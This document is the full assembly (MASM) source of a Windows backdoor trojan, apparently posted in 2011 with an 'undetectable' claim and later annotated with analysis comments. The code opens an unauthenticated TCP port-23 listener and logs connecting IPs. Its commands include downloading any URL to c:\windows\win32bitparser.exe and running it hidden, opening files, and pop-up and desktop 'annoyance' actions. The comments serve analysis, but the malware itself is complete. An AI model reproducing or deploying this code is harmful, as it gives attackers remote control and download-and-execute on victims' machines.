sosetutza

DirectConnection Trojan


[FUD] — the author's claim that the compiled binary was "fully undetectable" by antivirus at the time of posting (2011); not verified here.

;Released 5/29/2011

;Control channel: connect with a telnet client to the infected machine (the "server") on TCP port 23. The listener has no authentication and serves one client at a time.

[Am pus doar sursa sa nu il poata folosi tot prostu] (Romanian: "I have only posted the source so that not just any fool can use it.")

Commands (case-insensitive; each keyword is matched only as a prefix of the received line, and the line must end with a line feed)

Download to c:\windows\win32bitparser.exe and execute it with a hidden window = dl <your url>

Open a file on the infected machine with its registered handler (ShellExecute "open" verb) = open <file path>

Send messagebox = box <your text>

Draw text directly on the desktop with GDI = msg <your text> (an undocumented `line` command draws a fixed polyline the same way)

Open cd drive = cdopen

close cd drive = cdclose

Close your own connection (the listener keeps running and accepts the next client) = bye

Terminate the backdoor process on the infected machine = kill (the log file and any downloaded executable are left behind)


.486p
.model flat,stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\wsock32.inc
include \masm32\include\urlmon.inc
include \masm32\include\kernel32.inc
include \masm32\include\gdi32.inc
include \masm32\include\winmm.inc
includelib \masm32\lib\user32.lib
includelib \masm32\lib\wsock32.lib
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\gdi32.lib
includelib \masm32\lib\winmm.lib

include \masm32\include\shell32.inc
includelib \masm32\lib\shell32.lib
includelib \masm32\lib\urlmon.lib

.data
; ---------------------------------------------------------------------------
; Static strings and buffers. Analysis note: the file paths and the banner
; below are fixed host/network indicators of this backdoor.
; ---------------------------------------------------------------------------
ClassName db "Remote Annoyance",0 ; not referenced in the visible code
AppName db "Remote Annoyance",0 ; MessageBox caption used by the "box" command
fname1 db "C:\Windows\win32parser.brk",0 ; append-only log: peer IP on connect, then every raw command line
ftxt1 db "connected from : ",0 ; prefix of each connection log entry
welcome db "@RSTCenter.com",0 ; banner sent to every client right after accept()


killed db "You killed that poor Server..! ",13,10,0 ; reply to "kill"
thankz db "bye.... ",13,10,0 ; reply to "bye"
gotit db "ok..... ",0 ; generic success reply; several handlers send it without checking the API result
errrr db "error.. ",0 ; reply to an unrecognised command
; Command keywords. Dispatch copies only SIZEOF-1 bytes of the received line
; before comparing, so each keyword is matched as a case-insensitive prefix.
cm00 db "open",0 ; also reused as the ShellExecute verb
cm01 db "box",0
cm02 db "kill",0
cm03 db "bye",0
cm04 db "cd",0 ; followed by "open" or "clos" at offset 2 of the line
file db "c:\windows\win32bitparser.exe",0 ; drop path for "dl": URLDownloadToFile target, then started with WinExec SW_HIDE
cm05 db "line",0 ; not listed in the post: draws a fixed polyline on the screen
cm06 db "msg",0
cm07 db "dl",0
mci1 db "set cdaudio door open",0 ; MCI command strings for the CD tray
mci2 db "set cdaudio door closed",0
mci3 db 0 ; zero-length "return string" buffer handed to mciSendString
buff db 512 dup (0) ; receive buffer; the recv loop appends to it without comparing against this size
buff2 db 512 dup (0) ; scratch: the log line on connect, the command prefix during dispatch

.data?
s1 SOCKET ? ; listening socket, bound to 0.0.0.0:23
s2 SOCKET ? ; socket of the client currently being served (one at a time)
sin1 sockaddr_in <> ; local bind address
sin2 sockaddr_in <> ; peer address filled in by accept(); its IP is logged
wsaData WSADATA <>
hFile dd ? ; handle of the log file while a line is being appended
fwritten dd ? ; bytes-written out-parameter for WriteFile
temp dd ? ; reused: addrlen for accept(), then the inet_ntoa pointer, then the log line length
deskdc HDC ? ; screen DC obtained with GetDC(0) by the drawing commands



.code

start:
; ---------------------------------------------------------------------------
; Entry point of the backdoor (the "server" in the author's wording).
; Binds TCP port 23 on all interfaces, accepts one client at a time, logs the
; peer IP, then hands control to next_command, which executes newline-
; terminated commands. Nothing authenticates the client: anyone who can reach
; the port controls the host.
; ---------------------------------------------------------------------------
invoke WSAStartup,0101h,ADDR wsaData ; Winsock 1.1
invoke socket,PF_INET,SOCK_STREAM,0
mov s1,eax
mov ax,AF_INET
mov sin1.sin_family,ax
xor eax,eax
mov sin1.sin_addr,eax ; INADDR_ANY: listen on every interface
invoke htons,23 ;Connection Port, hard-coded; bind fails if something else already owns it
mov sin1.sin_port,ax
invoke bind,s1,ADDR sin1,SIZEOF sockaddr_in
cmp eax,SOCKET_ERROR
jne @F
; bind failed: tear down Winsock and return. EDI has not been set on this
; path, so clrbuff zeroes memory at whatever EDI holds at process start.
invoke WSACleanup
xor eax,eax
call clrbuff
ret
@@:
invoke listen,s1,1 ; backlog of one; no threads, so clients are strictly sequential
next_user:
invoke closesocket,s2 ; drop the previous client (s2 has never been assigned on the first pass)
mov eax,SIZEOF sockaddr_in
mov temp,eax
invoke accept,s1,ADDR sin2,ADDR temp ; blocks until a client connects
mov s2,eax
invoke send,s2,ADDR welcome,SIZEOF welcome,0 ; banner; SIZEOF counts the NUL, so it is sent too
; Append "connected from : <ip>" to the log file and echo the same bytes to
; the client.
invoke CreateFile,ADDR fname1,GENERIC_WRITE,FILE_SHARE_READ,0,
OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,0
mov hFile,eax
invoke SetFilePointer,hFile,0,0,FILE_END
mov eax,sin2.sin_addr ;get IP address of user
invoke inet_ntoa,eax
mov temp,eax ; temp now holds the pointer to the dotted-quad string
mov edi,OFFSET buff2
invoke lstrcpy,edi,ADDR ftxt1
add edi,SIZEOF ftxt1 ; SIZEOF counts the NUL, so the prefix's terminator stays in place and the IP is written after it
invoke lstrcpy,edi,temp
invoke lstrlen,temp
add edi,eax
mov eax,0a0d0000h ; little-endian bytes 00 00 0D 0A: two NULs, then CR LF
mov [edi],eax
add edi,4
mov eax,edi
sub eax,OFFSET buff2
mov temp,eax ; length of the assembled line (prefix incl. NUL + ip + 4)
invoke WriteFile,hFile,ADDR buff2,eax,ADDR fwritten,0 ; appends to fname1 (C:\Windows\win32parser.brk)
invoke send,s2,ADDR buff2,temp,0
invoke send,s2,ADDR gotit,SIZEOF gotit,0
invoke CloseHandle,hFile
next_command:
; Clear the receive buffer. clrbuff does not read the length placed in EAX
; (see its definition); it zeroes dwords from EDI until it meets one that is
; already zero.
mov edi,OFFSET buff
mov eax,SIZEOF buff
call clrbuff
mov edi,OFFSET buff
crecv:
; Accumulate bytes until a line feed arrives. Each recv() writes up to 500
; bytes at EDI and EDI advances without ever being compared against the
; 512-byte buff, so a long line with no LF runs past buff into buff2 and the
; data that follows it.
invoke recv,s2,edi,500,0
or eax,eax
jz next_user ; peer closed the connection
cmp eax,SOCKET_ERROR
je next_user
add edi,eax
mov al,[edi-1] ; last byte received
cmp al,08h ; telnet backspace: back up over it and the character before it
jne @F
xor eax,eax
mov [edi],ax
dec edi
dec edi
@@:
cmp al,0Ah ; keep reading until the line ends with LF
jne crecv
; Append the raw command line (up to its first NUL, CR LF included) to the
; log file.
invoke CreateFile,ADDR fname1,GENERIC_WRITE,FILE_SHARE_READ,0,
OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,0
mov hFile,eax ; log file is fname1 (C:\Windows\win32parser.brk)
invoke SetFilePointer,hFile,0,0,FILE_END
invoke lstrlen,ADDR buff
invoke WriteFile,hFile,ADDR buff,eax,ADDR fwritten,0
invoke CloseHandle,hFile


; Dispatch. For each keyword, lstrcpyn copies SIZEOF-1 characters of the
; line into buff2 and lstrcmpi compares case-insensitively, so only the
; prefix is checked ("MSGanything" matches "msg"). Check order: msg, dl,
; line, cd, bye, kill, box, open; anything else answers "error.. ".
invoke lstrcpyn,ADDR buff2,ADDR buff,SIZEOF cm06
invoke lstrcmpi,ADDR buff2,ADDR cm06
or eax,eax
jz dmsg ; "msg <text>"
invoke lstrcpyn,ADDR buff2,ADDR buff,SIZEOF cm07
invoke lstrcmpi,ADDR buff2,ADDR cm07
or eax,eax
jz download ; "dl <url>"
invoke lstrcpyn,ADDR buff2,ADDR buff,SIZEOF cm05
invoke lstrcmpi,ADDR buff2,ADDR cm05
or eax,eax
jz dline ; "line"
invoke lstrcpyn,ADDR buff2,ADDR buff,SIZEOF cm04
invoke lstrcmpi,ADDR buff2,ADDR cm04
or eax,eax
jz cdrom ; "cdopen" / "cdclose"
invoke lstrcpyn,ADDR buff2,ADDR buff,SIZEOF cm03
invoke lstrcmpi,ADDR buff2,ADDR cm03
or eax,eax
jz byebye ; "bye"
invoke lstrcpyn,ADDR buff2,ADDR buff,SIZEOF cm02
invoke lstrcmpi,ADDR buff2,ADDR cm02
or eax,eax
jz killer ; "kill"
invoke lstrcpyn,ADDR buff2,ADDR buff,SIZEOF cm01
invoke lstrcmpi,ADDR buff2,ADDR cm01
or eax,eax
jz msgbx ; "box <text>"
invoke lstrcpyn,ADDR buff2,ADDR buff,SIZEOF cm00
invoke lstrcmpi,ADDR buff2,ADDR cm00
or eax,eax
jnz err

; "open <path>": hand the path to ShellExecute with the "open" verb (cm00),
; so it is launched by whatever program is registered for its extension.
invoke lstrlen,OFFSET buff
mov edx,OFFSET buff
xor ebx,ebx
mov [edx+eax-2],ebx ; zero the last two bytes (intended to strip CR LF) plus two bytes beyond the NUL
add edx,5 ; skip "open "
invoke ShellExecute,NULL,ADDR cm00,edx,NULL,NULL,SW_SHOWNORMAL
invoke send,s2,ADDR gotit,SIZEOF gotit,0 ; "ok" is sent without checking ShellExecute's result
jmp next_command

err:
invoke send,s2,ADDR errrr,SIZEOF errrr,0
jmp next_command




download:
; "dl <url>": fetch <url> to c:\windows\win32bitparser.exe (file) and start
; it with a hidden window. Neither API result is checked before "ok" is sent,
; and the trailing CR LF of the command line is not removed from the URL.
mov eax,OFFSET buff
add eax,3 ; skip "dl "
Invoke URLDownloadToFile,0,eax,ADDR file,0,0
Invoke WinExec, Addr file , SW_HIDE
invoke send,s2,ADDR gotit,SIZEOF gotit,0
jmp next_command

msgbx:
; "box <text>": topmost, system-modal message box captioned "Remote
; Annoyance" (AppName). MessageBox returns only once dismissed, so the
; command loop (and the "ok" reply) waits for the user.
mov eax,OFFSET buff
add eax,3 ; skip "box "; the text keeps its trailing CR LF
mov ebx,MB_OK
or ebx,MB_TOPMOST
or ebx,MB_SYSTEMMODAL
or ebx,MB_ICONINFORMATION
invoke MessageBox,NULL,eax,ADDR AppName,ebx
invoke send,s2,ADDR gotit,SIZEOF gotit,0
jmp next_command

dline:
; "line": draw a fixed three-segment polyline straight onto the screen DC
; (GetDC(0)). Purely visual; the coordinates are hard-coded.
invoke GetDC,0
mov deskdc,eax
invoke MoveToEx,deskdc,100,300,NULL
invoke LineTo,deskdc,250,100
invoke LineTo,deskdc,550,400
invoke LineTo,deskdc,600,430
invoke ReleaseDC,0,deskdc
invoke send,s2,ADDR gotit,SIZEOF gotit,0
jmp next_command

dmsg:
; "msg <text>": write the text onto the screen DC at (100,200).
invoke GetDC,0
mov deskdc,eax
; The next two instructions store the dword 36 at EDI (still where the recv
; loop left it, just past the received line) and then pass EAX -- which still
; holds the DC handle -- to SelectObject as the "object". Neither result is
; used; this looks like a leftover from an attempt to select a font.
mov edx,36
mov [edi],edx
invoke SelectObject,deskdc,eax
invoke lstrlen,ADDR buff
sub eax,3 ; "msg " prefix
sub eax,2 ; CR LF
mov ecx,eax ; character count handed to TextOut
mov eax,OFFSET buff
add eax,3
invoke TextOut,deskdc,100,200,eax,ecx
invoke ReleaseDC,0,deskdc
invoke send,s2,ADDR gotit,SIZEOF gotit,0
jmp next_command

cdrom:
; "cdopen" / "cdclose": operate the CD tray through MCI. The dword at offset
; 2 of the line (right after "cd") is compared against 4-character literals;
; they read reversed in the source because the literal is compared as a
; little-endian dword, so "nepo" matches the bytes "open" and "solc" matches
; "clos". Any other suffix is reported as an error.
mov edi,OFFSET buff
mov eax,[edi+2]
cmp eax,"nepo" ;open or close
je cdopen
cmp eax,"solc"
jne err

cdclose:
invoke mciSendString,ADDR mci2,ADDR mci3,0,0 ; return-string buffer is mci3 with length 0
invoke send,s2,ADDR gotit,SIZEOF gotit,0
jmp next_command

cdopen:
invoke mciSendString,ADDR mci1,ADDR mci3,0,0
invoke send,s2,ADDR gotit,SIZEOF gotit,0
jmp next_command

clrbuff:
; Zero dwords starting at EDI until the dword following the one just cleared
; is already zero. There is no length parameter (callers load EAX before the
; call, but it is never read), so clearing stops at the first zero dword
; inside the data and would continue past the buffer if the memory after it
; is non-zero. Clobbers EDX and EBX; on return EDI points at the zero dword
; that stopped the loop.
xor edx,edx
mov [edi],edx
add edi,4
mov ebx,[edi]
test ebx,ebx
jnz clrbuff
ret

byebye:
; "bye": acknowledge, then go back to next_user, which closes s2 and waits
; for the next client. The listener stays up.
invoke send,s2,ADDR thankz,SIZEOF thankz,0
jmp next_user

killer:
; "kill": acknowledge, close both sockets, shut Winsock down and return from
; the entry point (there is no ExitProcess call). Nothing is removed from
; disk: the log file and any downloaded executable stay behind.
invoke send,s2,ADDR killed,SIZEOF killed,0
invoke closesocket,s1
invoke closesocket,s2
invoke WSACleanup
xor eax,eax
ret

end start
